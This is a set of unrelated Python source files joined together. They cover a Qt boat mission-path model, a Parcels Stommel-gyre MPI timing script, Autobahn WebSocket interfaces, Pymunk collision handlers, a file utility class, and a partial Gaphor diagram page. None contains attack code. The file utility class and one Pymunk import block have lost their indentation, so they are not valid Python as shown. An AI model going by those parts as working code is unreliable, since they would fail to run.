        - longitude: Longitude of the point to construct the
            fence polygon around
        """
        # Same as the base class, but the data source takes the point
        # around which to build the polygons.
        polygons = self.get_polygon_data(latitude, longitude)
        [self.polygonChanged.emit(pol) for pol in polygons]
class MissionPathModel(QAbstractListModel):
    """A model which stores the points on the current mission."""
    missionChanged = Signal()
    # Custom item role used by QML delegates to fetch a whole coordinate.
    # Qt reserves roles below Qt.UserRole (256) for built-ins, so start
    # just above it.  The original code referenced MissionPathModel.Both
    # in roleNames() without ever defining it, which raised
    # AttributeError as soon as QML queried the roles.
    Both = 257  # Qt.UserRole + 1
    def __init__(self, parent=None):
        """Create the model object and initialize the QT object."""
        super().__init__(parent)
        self._location = QGeoCoordinate(52.40359289862932, 4.662117677145794)
        self._target = QGeoCoordinate(52.40757766975709, 4.663778575775887)
        self._mission_paths = [self._location, self._target]
    def rowCount(self, parent=QModelIndex()):
        """Fetches the number of points on the path."""
        return len(self._mission_paths)
    def roleNames(self):
        """Returns the roles that the data can take."""
        return {MissionPathModel.Both: b"both"}
    def add(self, point: QGeoCoordinate) -> None:
        """Adds a coordinate to the path."""
        self._mission_paths.append(point)
    @Slot(int, result=QGeoCoordinate)
    def get(self, index: int):
        """QML accessible function to get data from the array.
        Args:
            index: Location of the data on the array,
        Returns:
            A QT representation of the next coordinate, or None when the
            index is out of range.
        """
        try:
            return self._mission_paths[index]
        except IndexError:
            return None
    @Slot()
    def clear(self):
        """QML accessible function to delete all the points of the mission."""
        self._mission_paths = []
    @Slot()
    def addSignal(self):
        """QML accessible function which adds some points to the list."""
        self.add(QGeoCoordinate(52.403747, 4.660064))
        self.add(QGeoCoordinate(52.408165, 4.667674))
        self.missionChanged.emit()
    @Slot(float, float, float, float)
    def createPath(self, boat_lat: float, boat_long: float, dest_lat: float,
                   dest_long: float):
        """QML accessible function which creates a new path.
        Generates points for path to given destination.
        Args:
        - boat_lat: Current latitude of boat
        - boat_long: Current longitude of boat
        - dest_lat: Latitude of desired destination
        - dest_long: Longitude of desired destination
        """
        mis = MissionPlanner()
        # Create boat object and trip.  Shapely points are (x, y) ==
        # (longitude, latitude), hence the swapped order.
        boat_id = 23
        boat_origin = Point(boat_long, boat_lat)
        boat_destination = Point(dest_long, dest_lat)
        boat = mis.add_new_mission(boat_id, boat_origin, boat_destination)
        boat = mis.generate_waypoints(boat, 50, 18, 20)
        self.clear()
        # Drain the planner's waypoint deque into the model.
        while len(boat._path) > 0:
            waypoint = boat._path.popleft()
            self.add(QGeoCoordinate(waypoint.y, waypoint.x))
        self.missionChanged.emit()
class ConfigFile(QObject):
    """Singleton class for config file."""
    def __init__(self, parent=None):
        """Create wrapper class around the Python config parser."""
        super().__init__(parent)
        self._config = config.ConfigFile()
    @Slot(str, str, result=str)
    def general_getter(self, topic: str, spec: str):
        """A general getter for a given topic and specification.
        Args:
        - topic: Configuration file topic to search in
        - spec: Name of item to fetch
        Returns:
            The configured value, as a string (per the slot signature).
        """
        return self._config.general_getter(topic, spec)
    @Slot(str, str, str)
    def write_to_file(self, topic: str, spec: str, val):
        """Write the given value to a (possibly new) spec in the config file.
        Args:
        - topic: Configuration file topic to write within
        - spec: Item name to bind value to
        - val: Value to write to config file
        """
        self._config.write_to_file(topic, spec, val)
    def add_topic(self, topic: str) -> None:
        """Add a new topic to the config file.
        Args:
        - topic: Name of new topic to add
        """
        self._config.add_topic(topic)
|
from parcels import (FieldSet, ParticleSet, JITParticle,
Variable, AdvectionRK4)
import numpy as np
import math
from datetime import timedelta as delta
import time as clock
import os
from argparse import ArgumentParser
from mpi4py import MPI
# Command-line interface: -p/--particles sets how many particles to advect.
p = ArgumentParser(description="""
blablabla""")
p.add_argument('-p', '--particles', type=int, default=1,
               help='Number of particles to advect')
args = p.parse_args()
npart = args.particles
# MPI bookkeeping: rank 0 does all the timing and writes the log file.
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
def stommel_fieldset(xdim=200, ydim=200):
    """Build the analytical Stommel-gyre FieldSet on a flat A-grid.

    Args:
        xdim, ydim: number of grid points in the zonal / meridional
            direction.

    Returns:
        A parcels FieldSet with fields U (zonal), V (meridional) and
        P (sea surface height).

    The per-point double Python loop of the original is replaced by a
    vectorised NumPy evaluation of the same formulas (computed in
    float64 and cast to float32, exactly as element-wise assignment
    into the original float32 arrays did).
    """
    a = 10000 * 1e3
    b = 10000 * 1e3
    scalefac = 0.05  # to scale for physically meaningful velocities
    # Coordinates of the test fieldset (on A-grid in deg)
    lon = np.linspace(0, a, xdim, dtype=np.float32)
    lat = np.linspace(0, b, ydim, dtype=np.float32)
    beta = 2e-11
    r = 1/(11.6*86400)
    es = r/(beta*a)
    # Normalised coordinates as float64 column/row vectors; broadcasting
    # yields (xdim, ydim) arrays matching the original loop's layout.
    xi = (lon.astype(np.float64) / a)[:, np.newaxis]
    yi = (lat.astype(np.float64) / b)[np.newaxis, :]
    common = 1 - np.exp(-xi / es) - xi
    P = (common * np.pi * np.sin(np.pi * yi) * scalefac).astype(np.float32)
    U = (-common * np.pi ** 2 * np.cos(np.pi * yi) * scalefac).astype(np.float32)
    V = ((np.exp(-xi / es) / es - 1) * np.pi * np.sin(np.pi * yi) * scalefac).astype(np.float32)
    data = {'U': U, 'V': V, 'P': P}
    dimensions = {'lon': lon, 'lat': lat}
    return FieldSet.from_data(data, dimensions, mesh='flat', transpose=True)
def UpdateP(particle, fieldset, time):
    # Parcels kernel: sample the P field at the particle's position.
    # NOTE(review): kernels are parsed and converted to C by parcels, so
    # the body is kept as a single plain assignment.
    particle.p = fieldset.P[time, particle.depth, particle.lat, particle.lon]
def stommel_pset(fieldset, npart=1):
    """Release *npart* particles on a zonal line through the gyre.

    Each particle carries `p` (P sampled along the trajectory by the
    UpdateP kernel) and `p_start` (P sampled at the release position).
    """
    class MyParticle(JITParticle):
        p = Variable('p', dtype=np.float32, initial=0.)
        p_start = Variable('p_start', dtype=np.float32, initial=fieldset.P)
    return ParticleSet.from_line(fieldset,
                                 size=npart,
                                 pclass=MyParticle,
                                 start=(10e3, 5000e3),
                                 finish=(1000e3, 5000e3),
                                 time=0)
# Time each phase (fieldset creation, particle-set creation, kernel
# setup, execution).  Barriers keep all ranks in sync so rank 0's
# wall-clock readings are representative of the whole job.
comm.Barrier()
if rank == 0:
    tic = clock.time()
comm.Barrier()
fset = stommel_fieldset()
comm.Barrier()
if rank == 0:
    tic_pset = clock.time()
comm.Barrier()
pset = stommel_pset(fset, npart=npart)
comm.Barrier()
if rank == 0:
    tac_pset = clock.time()
comm.Barrier()
kernel = AdvectionRK4 + pset.Kernel(UpdateP)
comm.Barrier()
if rank == 0:
    toc = clock.time()
comm.Barrier()
pset.execute(kernel,
             runtime=delta(days=365*5),
             dt=delta(hours=1))
comm.Barrier()
if rank == 0:
    tac = clock.time()
    ofile = 'stommel_npart_scaling.log'
    # Append so repeated runs at different process counts accumulate in
    # one scaling log; `with` guarantees the handle is closed even if
    # the write fails (the original used bare open/write/close).
    with open(ofile, 'a') as f:
        f.write('CPU time on %02d procs for %d particles is: %g (%g %g)\n' %
                (size, npart, tac-tic, tac-toc, tac_pset-tic_pset))
|
###############################################################################
##
## Copyright (C) 2013-2014 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
__all__ = ['IWebSocketChannel',
'IWebSocketChannelFrameApi',
'IWebSocketChannelStreamingApi']
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class IWebSocketChannel(object):
    """
    A WebSocket channel is a bidirectional, full-duplex, ordered, reliable message channel
    over a WebSocket connection as specified in RFC6455.
    This interface defines a message-based API to WebSocket plus auxiliary hooks
    and methods.
    """
    @abc.abstractmethod
    def onConnect(self, requestOrResponse):
        """
        Callback fired during WebSocket opening handshake when a client connects (with
        request from client) or when server connection established (with response from
        server).
        :param requestOrResponse: Connection request or response.
        :type requestOrResponse: Instance of :class:`autobahn.websocket.protocol.ConnectionRequest`
                                 or :class:`autobahn.websocket.protocol.ConnectionResponse`.
        """
    @abc.abstractmethod
    def onOpen(self):
        """
        Callback fired when the initial WebSocket opening handshake was completed.
        You now can send and receive WebSocket messages.
        """
    @abc.abstractmethod
    def sendMessage(self, payload, isBinary = False, fragmentSize = None, sync = False, doNotCompress = False):
        """
        Send a WebSocket message.
        You can send text or binary messages, and optionally specify a payload fragment size.
        When the latter is given, the payload will be split up into WebSocket frames each with
        payload length `<= fragmentSize`.
        :param payload: The message payload.
        :type payload: bytes
        :param isBinary: `True` iff payload is binary, else the payload must be UTF-8 encoded text.
        :type isBinary: bool
        :param fragmentSize: Fragment message into WebSocket fragments of this size.
        :type fragmentSize: int
        :param sync: Iff `True`, try to force data onto the wire immediately. Note: do NOT use
                     this normally unless you know what you are doing. Performance likely will
                     suffer significantly. This feature is mainly here for use by Autobahn|Testsuite.
        :type sync: bool
        :param doNotCompress: Iff `True`, never compress this message. This only applies to
                              Hybi-Mode and only when WebSocket compression has been negotiated on
                              the WebSocket connection. Use when you know the payload
                              uncompressible (e.g. encrypted or already compressed).
        :type doNotCompress: bool
        """
    @abc.abstractmethod
    def onMessage(self, payload, isBinary):
        """
        Callback fired when a complete WebSocket message was received.
        :param payload: Message payload (UTF-8 encoded text or binary). Can also be empty when
                        the WebSocket message contained no payload.
        :type payload: bytes
        :param isBinary: `True` iff payload is binary, else the payload is UTF-8 encoded text.
        :type isBinary: bool
        """
    @abc.abstractmethod
    def sendClose(self, code = None, reason = None):
        """
        Starts a WebSocket closing handshake tearing down the WebSocket connection.
        :param code: An optional close status code (`1000` for normal close or `3000-4999` for
                     application specific close).
        :type code: int
        :param reason: An optional close reason (a string that when present, a status
                       code MUST also be present).
        :type reason: str
        """
    @abc.abstractmethod
    def onClose(self, wasClean, code, reason):
        """
        Callback fired when the WebSocket connection has been closed (WebSocket closing
        handshake has been finished or the connection was closed uncleanly).
        :param wasClean: True, iff the WebSocket connection was closed cleanly.
        :type wasClean: bool
        :param code: None or close status code (as sent by the WebSocket peer).
        :type code: int
        :param reason: None or close reason (as sent by the WebSocket peer).
        :type reason: str
        """
    @abc.abstractmethod
    def sendPreparedMessage(self, preparedMsg):
        """
        Send a message that was previously prepared with :func:`autobahn.websocket.protocol.WebSocketFactory.prepareMessage`.
        :param preparedMsg: A previously prepared message.
        :type preparedMsg: Instance of :class:`autobahn.websocket.protocol.PreparedMessage`.
        """
    @abc.abstractmethod
    def sendPing(self, payload = None):
        """
        Send a WebSocket ping to the peer.
        A peer is expected to pong back the payload as soon as "practical". When more than
        one ping is outstanding at a peer, the peer may elect to respond only to the last ping.
        :param payload: An (optional) arbitrary payload of length `<126` octets.
        :type payload: bytes
        """
    @abc.abstractmethod
    def onPing(self, payload):
        """
        Callback fired when a WebSocket ping was received. A default implementation responds
        by sending a WebSocket pong.
        :param payload: Payload of ping (when there was any). Can be arbitrary, up to `125` octets.
        :type payload: bytes
        """
    @abc.abstractmethod
    def sendPong(self, payload = None):
        """
        Send a WebSocket pong to the peer.
        A WebSocket pong may be sent unsolicited. This serves as a unidirectional heartbeat.
        A response to an unsolicited pong is "not expected".
        :param payload: An (optional) arbitrary payload of length < 126 octets.
        :type payload: bytes
        """
    @abc.abstractmethod
    def onPong(self, payload):
        """
        Callback fired when a WebSocket pong was received. A default implementation does nothing.
        :param payload: Payload of pong (when there was any). Can be arbitrary, up to 125 octets.
        :type payload: bytes
        """
class IWebSocketChannelFrameApi(IWebSocketChannel):
    """
    Frame-based API to a WebSocket channel.
    """
    @abc.abstractmethod
    def onMessageBegin(self, isBinary):
        """
        Callback fired when receiving of a new WebSocket message has begun.
        :param isBinary: `True` iff payload is binary, else the payload is UTF-8 encoded text.
        :type isBinary: bool
        """
    @abc.abstractmethod
    def onMessageFrame(self, payload):
        """
        Callback fired when a complete WebSocket message frame for a previously begun
        WebSocket message has been received.
        :param payload: Message frame payload (a list of chunks received).
        :type payload: list of bytes
        """
    @abc.abstractmethod
    def onMessageEnd(self):
        """
        Callback fired when a WebSocket message has been completely received (the last
        WebSocket frame for that message has been received).
        """
    @abc.abstractmethod
    def beginMessage(self, isBinary = False, doNotCompress = False):
        """
        Begin sending a new WebSocket message.
        :param isBinary: `True` iff payload is binary, else the payload must be UTF-8 encoded text.
        :type isBinary: bool
        :param doNotCompress: Iff `True`, never compress this message. This only applies to
                              Hybi-Mode and only when WebSocket compression has been negotiated on
                              the WebSocket connection. Use when you know the payload
                              uncompressible (e.g. encrypted or already compressed).
        :type doNotCompress: bool
        """
    @abc.abstractmethod
    def sendMessageFrame(self, payload, sync = False):
        """
        When a message has been previously begun, send a complete message frame in one go.
        :param payload: The message frame payload. When sending a text message, the payload must
                        be UTF-8 encoded already.
        :type payload: bytes
        :param sync: Iff `True`, try to force data onto the wire immediately. Note: do NOT use
                     this normally unless you know what you are doing. Performance likely will
                     suffer significantly. This feature is mainly here for use by Autobahn|Testsuite.
        :type sync: bool
        """
    @abc.abstractmethod
    def endMessage(self):
        """
        End a previously begun message. No more frames may be sent (for that message).
        You have to begin a new message before sending again.
        """
class IWebSocketChannelStreamingApi(IWebSocketChannelFrameApi):
    """
    Streaming API to a WebSocket channel.
    """
    @abc.abstractmethod
    def onMessageFrameBegin(self, length):
        """
        Callback fired when receiving a new message frame has begun.
        A default implementation will prepare to buffer message frame data.
        :param length: Payload length of message frame which is subsequently received.
        :type length: int
        """
    @abc.abstractmethod
    def onMessageFrameData(self, payload):
        """
        Callback fired when receiving data within a previously begun message frame.
        A default implementation will buffer data for frame.
        :param payload: Partial payload for message frame.
        :type payload: bytes
        """
    @abc.abstractmethod
    def onMessageFrameEnd(self):
        """
        Callback fired when a previously begun message frame has been completely received.
        A default implementation will flatten the buffered frame data and
        fire `onMessageFrame`.
        """
    @abc.abstractmethod
    def beginMessageFrame(self, length):
        """
        Begin sending a new message frame.
        :param length: Length of the frame which is to be started. Must be `>= 0` and `<= 2^63`.
        :type length: int
        """
    @abc.abstractmethod
    def sendMessageFrameData(self, payload, sync = False):
        """
        Send out data when within a message frame (message was begun, frame was begun).
        Note that the frame is automatically ended when enough data has been sent.
        In other words, there is no `endMessageFrame`, since you have begun the frame
        specifying the frame length, which implicitly defined the frame end. This is different
        from messages, which you begin *and* end explicitly, since a message can contain
        an unlimited number of frames.
        :param payload: Frame payload to send.
        :type payload: bytes
        :param sync: Iff `True`, try to force data onto the wire immediately. Note: do NOT use
                     this normally unless you know what you are doing. Performance likely will
                     suffer significantly. This feature is mainly here for use by Autobahn|Testsuite.
        :type sync: bool
        :returns: int -- When the currently sent message frame is still incomplete,
                  returns octets remaining to be sent. When the frame is complete,
                  returns `0`, when `< 0`, the amount of unconsumed data in payload
                  argument.
        """
|
<gh_stars>100-1000
__version__ = "$Id$"
__docformat__ = "reStructuredText"
import warnings
from typing import TYPE_CHECKING, Any, Callable, Dict, Optional
if TYPE_CHECKING:
from .space import Space
from ._chipmunk_cffi import ffi
from .arbiter import Arbiter
# Signatures of the four collision callbacks: begin/pre_solve return a bool
# (whether to process the collision); post_solve/separate return nothing.
_CollisionCallbackBool = Callable[[Arbiter, "Space", Any], bool]
_CollisionCallbackNoReturn = Callable[[Arbiter, "Space", Any], None]
class CollisionHandler(object):
    """A collision handler is a set of 4 function callbacks for the different
    collision events that Pymunk recognizes.
    Collision callbacks are closely associated with Arbiter objects. You
    should familiarize yourself with those as well.
    Note #1: Shapes tagged as sensors (Shape.sensor == true) never generate
    collisions that get processed, so collisions between sensors shapes and
    other shapes will never call the post_solve() callback. They still
    generate begin(), and separate() callbacks, and the pre_solve() callback
    is also called every frame even though there is no collision response.
    Note #2: pre_solve() callbacks are called before the sleeping algorithm
    runs. If an object falls asleep, its post_solve() callback won't be
    called until it's re-awoken.
    """
    def __init__(self, _handler: Any, space: "Space") -> None:
        """Initialize a CollisionHandler object from the Chipmunk equivalent
        struct and the Space.
        .. note::
            You should never need to create an instance of this class directly.
        """
        self._handler = _handler
        self._space = space
        # For each event we keep two references: the live ffi callback
        # (kept alive so the C side can call it) and the original Python
        # function (so the handler can be pickled / introspected).
        self._begin = None
        self._begin_base: Optional[_CollisionCallbackBool] = None  # For pickle
        self._pre_solve = None
        self._pre_solve_base: Optional[_CollisionCallbackBool] = None  # For pickle
        self._post_solve = None
        self._post_solve_base: Optional[_CollisionCallbackNoReturn] = None  # For pickle
        self._separate = None
        self._separate_base: Optional[_CollisionCallbackNoReturn] = None  # For pickle
        self._data: Dict[Any, Any] = {}
    def _reset(self) -> None:
        # Restore the default behaviour: process every collision, do
        # nothing extra on post_solve/separate.
        def allways_collide(arb: Arbiter, space: "Space", data: Any) -> bool:
            return True
        def do_nothing(arb: Arbiter, space: "Space", data: Any) -> None:
            return
        self.begin = allways_collide
        self.pre_solve = allways_collide
        self.post_solve = do_nothing
        self.separate = do_nothing
    @property
    def data(self) -> Dict[Any, Any]:
        """Data property that get passed on into the
        callbacks.
        data is a dictionary and you can not replace it, only fill it with data.
        Useful if the callback needs some extra data to perform its function.
        """
        return self._data
    def _set_begin(self, func: Callable[[Arbiter, "Space", Any], bool]) -> None:
        # Wrap the Python callback in an ffi callback Chipmunk can call.
        @ffi.callback("cpCollisionBeginFunc")
        def cf(_arb: ffi.CData, _space: ffi.CData, _: ffi.CData) -> bool:
            x = func(Arbiter(_arb, self._space), self._space, self._data)
            if isinstance(x, bool):
                return x
            # Non-bool return: warn (pointing at the user's function) and
            # process the collision anyway.
            func_name = func.__code__.co_name
            filename = func.__code__.co_filename
            lineno = func.__code__.co_firstlineno
            warnings.warn_explicit(
                "Function '" + func_name + "' should return a bool to"
                " indicate if the collision should be processed or not when"
                " used as 'begin' or 'pre_solve' collision callback.",
                UserWarning,
                filename,
                lineno,
                func.__module__,
            )
            return True
        self._begin = cf
        self._begin_base = func
        self._handler.beginFunc = cf
    def _get_begin(self) -> Optional[_CollisionCallbackBool]:
        return self._begin_base
    begin = property(
        _get_begin,
        _set_begin,
        doc="""Two shapes just started touching for the first time this step.
        ``func(arbiter, space, data) -> bool``
        Return true from the callback to process the collision normally or
        false to cause pymunk to ignore the collision entirely. If you return
        false, the `pre_solve` and `post_solve` callbacks will never be run,
        but you will still recieve a separate event when the shapes stop
        overlapping.
        """,
    )
    def _set_pre_solve(self, func: _CollisionCallbackBool) -> None:
        @ffi.callback("cpCollisionPreSolveFunc")
        def cf(_arb: ffi.CData, _space: ffi.CData, _: ffi.CData) -> bool:
            x = func(Arbiter(_arb, self._space), self._space, self._data)
            # NOTE(review): this accepts any int while _set_begin checks
            # isinstance(x, bool) — inconsistent; 0/1 returns warn there
            # but pass silently here. Confirm which is intended.
            if isinstance(x, int):
                return x
            func_name = func.__code__.co_name
            filename = func.__code__.co_filename
            lineno = func.__code__.co_firstlineno
            warnings.warn_explicit(
                "Function '" + func_name + "' should return a bool to"
                " indicate if the collision should be processed or not when"
                " used as 'begin' or 'pre_solve' collision callback.",
                UserWarning,
                filename,
                lineno,
                func.__module__,
            )
            return True
        self._pre_solve = cf
        self._pre_solve_base = func
        self._handler.preSolveFunc = cf
    def _get_pre_solve(self) -> Optional[Callable[[Arbiter, "Space", Any], bool]]:
        return self._pre_solve_base
    pre_solve = property(
        _get_pre_solve,
        _set_pre_solve,
        doc="""Two shapes are touching during this step.
        ``func(arbiter, space, data) -> bool``
        Return false from the callback to make pymunk ignore the collision
        this step or true to process it normally. Additionally, you may
        override collision values using Arbiter.friction, Arbiter.elasticity
        or Arbiter.surfaceVelocity to provide custom friction, elasticity,
        or surface velocity values. See Arbiter for more info.
        """,
    )
    def _set_post_solve(self, func: _CollisionCallbackNoReturn) -> None:
        @ffi.callback("cpCollisionPostSolveFunc")
        def cf(_arb: ffi.CData, _space: ffi.CData, _: ffi.CData) -> None:
            func(Arbiter(_arb, self._space), self._space, self._data)
        self._post_solve = cf
        self._post_solve_base = func
        self._handler.postSolveFunc = cf
    def _get_post_solve(self) -> Optional[_CollisionCallbackNoReturn]:
        return self._post_solve_base
    post_solve = property(
        _get_post_solve,
        _set_post_solve,
        doc="""Two shapes are touching and their collision response has been
        processed.
        ``func(arbiter, space, data)``
        You can retrieve the collision impulse or kinetic energy at this
        time if you want to use it to calculate sound volumes or damage
        amounts. See Arbiter for more info.
        """,
    )
    def _set_separate(self, func: _CollisionCallbackNoReturn) -> None:
        @ffi.callback("cpCollisionSeparateFunc")
        def cf(_arb: ffi.CData, _space: ffi.CData, _: ffi.CData) -> None:
            try:
                # this try is needed since a separate callback will be called
                # if a colliding object is removed, regardless if its in a
                # step or not.
                self._space._locked = True
                func(Arbiter(_arb, self._space), self._space, self._data)
            finally:
                self._space._locked = False
        self._separate = cf
        self._separate_base = func
        self._handler.separateFunc = cf
    def _get_separate(self) -> Optional[_CollisionCallbackNoReturn]:
        return self._separate_base
    separate = property(
        _get_separate,
        _set_separate,
        doc="""Two shapes have just stopped touching for the first time this
        step.
        ``func(arbiter, space, data)``
        To ensure that begin()/separate() are always called in balanced
        pairs, it will also be called when removing a shape while its in
        contact with something or when de-allocating the space.
        """,
    )
|
from pathlib import Path
from helios.text import Encoding
import chardet
import difflib
import re
from binaryornot.check import is_binary
_PATTERN_DIFF_LINE_INFO = re.compile(r"^@@[\x00-\x7f]*@@$")
_PATTERN_DIFF_LINE_LEFT = re.compile(r"^-[\x00-\x7f]*")
_PATTERN_DIFF_LINE_RIGHT = re.compile(r"^\+[\x00-\x7f]*")
class File:
def __init__(self, file_path):
super().__init__()
self._path = Path(file_path)
if not self._path.parent.exists():
self._path.parent.mkdir(parents=True, exist_ok=True)
self._path.touch()
self._encoding = None
self._is_text = None
@property
def full_path(self) -> str:
return str(self._path.resolve())
@property
def size(self) -> int:
return self._path.stat().st_size
@property
def is_text(self) -> bool:
if not self._is_text:
self._is_text = False if is_binary(self.full_path) else True
return self._is_text
@property
def encoding(self) -> Encoding:
if not self._encoding:
rawdata = self._path.read_bytes()
encoding = chardet.detect(rawdata)['encoding']
for e in Encoding:
if encoding == e.value:
self._encoding = e
return self._encoding
def cp(self, file_output: str):
output = File(file_output)
output._path.write_bytes(self._path.read_bytes())
return output
@property
def text(self) -> str:
if self.size == 0:
return ''
if self.encoding:
return self._path.read_text(self.encoding.value)
else:
return self._path.read_text(Encoding.UTF8.value)
# raise Exception('File.text Error', f'{self.full_path}')
# return self._path.read_bytes()
def convert(
self,
file_output: str,
encoding: Encoding = Encoding.UTF8):
output = File(file_output)
if self.encoding == Encoding.UTF8:
output._path.write_bytes(self._path.read_bytes())
else:
context = self._path.read_text(self.encoding.value)
output._path.write_text(context, Encoding.UTF8.value)
def diff(self, rhs) -> list:
text_lhs = self.text.splitlines()
text_rhs = rhs.text.splitlines()
diff_text = []
for line in difflib.unified_diff(
text_lhs,
text_rhs,
fromfile=self.full_path,
tofile=rhs.full_path
):
diff_text.append(line)
return diff_text
def diff_dict(self, rhs):
result_left = dict()
result_right = dict()
diff_lines = self.diff(rhs)
key = ''
text_left = None
text_right = None
for line in diff_lines:
if _PATTERN_DIFF_LINE_INFO.match(line):
if line != key:
if key != '' and text_left:
text_left = '\n'.join(text_left)
result_left[key] = text_left
text_right = '\n'.join(text_right)
result_right[key] = text_right
key = line.replace('\n', '')
text_left = list()
text_right = list()
result_left[key] = text_left
result_right[key] = text_right
else:
if key != '' and _PATTERN_DIFF_LINE_LEFT.match(line):
text_left.append(line)
if key != '' and _PATTERN_DIFF_LINE_RIGHT.match(line):
text_right.append(line)
return (result_left, result_right)
@staticmethod
def rm(file):
    # Delete the given File's underlying path from disk. No existence check:
    # a missing file raises FileNotFoundError.
    file._path.unlink()
|
import logging
from typing import Optional
import gaphas.segment # Just register the handlers in this module
from gaphas.freehand import FreeHandPainter
from gaphas.painter import (
BoundingBoxPainter,
FocusedItemPainter,
HandlePainter,
ItemPainter,
PainterChain,
ToolPainter,
)
from gaphas.tool import Tool
from gaphas.view import GtkView
from gi.repository import Gdk, GLib, Gtk
from gaphor import UML
from gaphor.core import action, event_handler, gettext, transactional
from gaphor.diagram.diagramtoolbox import TOOLBOX_ACTIONS
from gaphor.diagram.diagramtools import (
DefaultTool,
PlacementTool,
TransactionalToolChain,
)
from gaphor.diagram.event import DiagramItemPlaced
from gaphor.diagram.support import get_diagram_item
from gaphor.services.properties import PropertyChanged
from gaphor.transaction import Transaction
from gaphor.ui.actiongroup import create_action_group
from gaphor.ui.event import DiagramSelectionChanged
from gaphor.UML.event import ElementDeleted
log = logging.getLogger(__name__)
def tooliter(toolbox_actions):
    """
    Yield every toolbox item, regardless of section headers.
    """
    for _section_name, items in toolbox_actions:
        yield from items
class DiagramPage:
    """One diagram tab: wraps a GtkView for a single diagram, wiring up
    tools, drag-and-drop, toolbox shortcuts, zoom/selection actions and
    reactions to model/property events."""

    # Drag-and-drop target identifiers for the diagram view.
    VIEW_TARGET_STRING = 0
    VIEW_TARGET_ELEMENT_ID = 1
    VIEW_TARGET_TOOLBOX_ACTION = 2
    VIEW_DND_TARGETS = [
        Gtk.TargetEntry.new("gaphor/element-id", 0, VIEW_TARGET_ELEMENT_ID),
        Gtk.TargetEntry.new("gaphor/toolbox-action", 0, VIEW_TARGET_TOOLBOX_ACTION),
    ]
    def __init__(self, diagram, event_manager, element_factory, properties):
        """Store collaborators and subscribe to the events this page reacts to.

        view/widget stay None until construct() is called.
        """
        self.event_manager = event_manager
        self.element_factory = element_factory
        self.properties = properties
        self.diagram = diagram
        self.view: Optional[GtkView] = None
        self.widget: Optional[Gtk.Widget] = None
        self.event_manager.subscribe(self._on_element_delete)
        self.event_manager.subscribe(self._on_sloppy_lines)
        self.event_manager.subscribe(self._on_diagram_item_placed)
    # Tab title: the diagram's name, or "<None>" when unset.
    title = property(lambda s: s.diagram and s.diagram.name or gettext("<None>"))
    def get_diagram(self):
        return self.diagram
    def get_view(self):
        return self.view
    def get_canvas(self):
        return self.diagram.canvas
    def construct(self):
        """
        Create the widget.
        Returns: the newly created widget.
        """
        assert self.diagram
        view = GtkView(canvas=self.diagram.canvas)
        try:
            view.set_css_name("diagramview")
        except AttributeError:
            pass  # Gtk.Widget.set_css_name() is added in 3.20
        view.drag_dest_set(
            Gtk.DestDefaults.ALL,
            DiagramPage.VIEW_DND_TARGETS,
            Gdk.DragAction.MOVE | Gdk.DragAction.COPY | Gdk.DragAction.LINK,
        )
        scrolled_window = Gtk.ScrolledWindow()
        scrolled_window.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.AUTOMATIC)
        scrolled_window.add(view)
        scrolled_window.show_all()
        self.widget = scrolled_window
        view.connect("focus-changed", self._on_view_selection_changed)
        view.connect("selection-changed", self._on_view_selection_changed)
        view.connect_after("key-press-event", self._on_key_press_event)
        view.connect("drag-data-received", self._on_drag_data_received)
        self.view = view
        self.widget.action_group = create_action_group(self, "diagram")
        shortcuts = self.get_toolbox_shortcuts()
        # Map toolbox accelerator keys to the "select-tool" stateful action.
        def shortcut_action(widget, event):
            action_name = shortcuts.get((event.keyval, event.state))
            if action_name:
                widget.get_toplevel().get_action_group("diagram").lookup_action(
                    "select-tool"
                ).change_state(GLib.Variant.new_string(action_name))
        self.widget.connect("key-press-event", shortcut_action)
        self._on_sloppy_lines()
        self.select_tool("toolbox-pointer")
        return self.widget
    def get_tool(self, tool_name):
        """
        Return a tool associated with an id (action name).
        """
        if tool_name == "toolbox-pointer":
            return DefaultTool(self.event_manager)
        tool = next(t for t in tooliter(TOOLBOX_ACTIONS) if t.id == tool_name)
        item_factory = tool.item_factory
        handle_index = tool.handle_index
        return PlacementTool(
            self.view,
            item_factory=item_factory,
            event_manager=self.event_manager,
            handle_index=handle_index,
        )
    def get_toolbox_shortcuts(self):
        """Build a {(keyval, modifiers): action_name} map from TOOLBOX_ACTIONS."""
        shortcuts = {}
        # accelerator keys are lower case. Since we handle them in a key-press event
        # handler, we'll need the upper-case versions as well in case Shift is pressed.
        upper_offset = ord("A") - ord("a")
        for title, items in TOOLBOX_ACTIONS:
            for action_name, label, icon_name, shortcut, *rest in items:
                if shortcut:
                    key, mod = Gtk.accelerator_parse(shortcut)
                    shortcuts[key, mod] = action_name
                    shortcuts[key + upper_offset, mod] = action_name
        return shortcuts
    @event_handler(ElementDeleted)
    def _on_element_delete(self, event: ElementDeleted):
        # Close this page when its own diagram is removed from the model.
        if event.element is self.diagram:
            self.close()
    @event_handler(PropertyChanged)
    def _on_sloppy_lines(self, event: Optional[PropertyChanged] = None):
        # React to the "diagram.sloppiness" property; also called without an
        # event from construct() to apply the default (straight) style.
        if not event or event.key == "diagram.sloppiness":
            self.set_drawing_style(event and event.new_value or 0.0)
    def close(self):
        """
        Tab is destroyed. Do the same thing that would
        be done if Close was pressed.
        """
        assert self.widget
        self.widget.destroy()
        self.event_manager.unsubscribe(self._on_element_delete)
        self.event_manager.unsubscribe(self._on_sloppy_lines)
        self.event_manager.unsubscribe(self._on_diagram_item_placed)
        self.view = None
    @action(
        name="diagram.zoom-in", shortcut="<Primary>plus",
    )
    def zoom_in(self):
        assert self.view
        self.view.zoom(1.2)
    @action(
        name="diagram.zoom-out", shortcut="<Primary>minus",
    )
    def zoom_out(self):
        assert self.view
        self.view.zoom(1 / 1.2)
    @action(
        name="diagram.zoom-100", shortcut="<Primary>0",
    )
    def zoom_100(self):
        # Reset to 100%: divide out the current scale factor from the matrix.
        assert self.view
        zx = self.view.matrix[0]
        self.view.zoom(1 / zx)
    @action(
        name="diagram.select-all", shortcut="<Primary>a",
    )
    def select_all(self):
        assert self.view
